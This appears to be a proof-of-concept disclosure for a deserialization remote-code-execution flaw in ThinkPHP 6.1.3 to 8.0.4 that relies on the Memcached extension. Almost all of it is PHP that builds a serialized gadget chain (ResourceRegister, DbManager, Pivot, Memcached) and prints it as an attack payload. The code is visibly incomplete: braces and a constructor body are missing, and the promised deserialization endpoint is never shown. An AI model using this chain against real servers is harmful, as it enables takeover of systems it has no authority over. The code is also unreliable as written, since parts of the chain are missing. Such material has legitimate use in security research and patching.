A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.
Thinkphp v6.1.3 to v8.0.4
The thinkphp framework should have installed the Memcached extension.
- Test environment: php8.0.7+thinkphp8.0.4+memcached3.2.0.
First, add new deserialization endpoint in app\controller\Index.php, such as:
namespace app\controller;
use app\BaseController;
class Index extends BaseController
public function index()
return '<style>*{ padding: 0; margin: 0; }</style><iframe src="https://www.thinkphp.cn/welcome?version=' . \think\facade\App::version() . '" width="100%" height="100%" frameborder="0" scrolling="auto"></iframe>';
public function hello($name = 'ThinkPHP8')
return 'hello,' . $name;
You can generate payload from:
namespace think\cache\driver;
use think\model\Pivot;
class Memcached{
protected $options=[];
function __construct()
$this->options["username"]=new Pivot();
namespace think\model;
use think\model;
class Pivot extends Model
namespace think;
abstract class Model{
private $data = [];
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = true;
function __construct()
namespace think\route;
use think\DbManager;
class ResourceRegister
protected $registered = false;
protected $resource;
function __construct()
$this->resource=new DbManager();
namespace think;
use think\model\Pivot;
class DbManager
protected $instance = [];
protected $config = [];
function __construct()
$this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]];
use think\route\ResourceRegister;
$r=new ResourceRegister();
echo urlencode(serialize($r));
Use the payload to deserialize can result to RCE: